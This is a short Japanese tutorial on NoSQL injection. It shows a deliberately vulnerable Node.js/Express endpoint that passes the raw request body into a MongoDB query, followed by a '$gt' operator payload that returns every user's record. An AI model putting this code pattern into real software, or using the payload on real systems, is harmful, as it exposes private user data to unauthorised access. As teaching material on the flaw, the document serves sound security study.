NoSQLインジェクション

脆弱なソースコード(Node.js)

const express = require('express')
const app = express()
app.use(express.json())

const MongoClient = require('mongodb').MongoClient;
MongoClient.connect('mongodb://localhost:27017/test_db', { minPoolSize: 20, maxPoolSize: 20 },async (error, client) => {
  if (error) {
    console.log('error :', error);
  } else {
    app.locals.db = client.db('test_db');
    app.post('/', async (req, res) => {
      const result = await res.app.locals.db
        .collection('users')
        .find(req.body)
        .toArray();
        res.json(result);
    })
    // start express server
    var server = app.listen(3003, function(){
      console.log("listening to PORT:" + server.address().port);
    });
  }
})

攻撃方法

正常系

POST / HTTP/1.1
Host: localhost:3003
Content-Type: application/json
Content-Length: 15

{"name":"Jane"}

に対して

POST / HTTP/1.1
Host: localhost:3003
Content-Type: application/json
Content-Length: 19

{"name":{"$gt":""}}

で全員分のデータが取得できる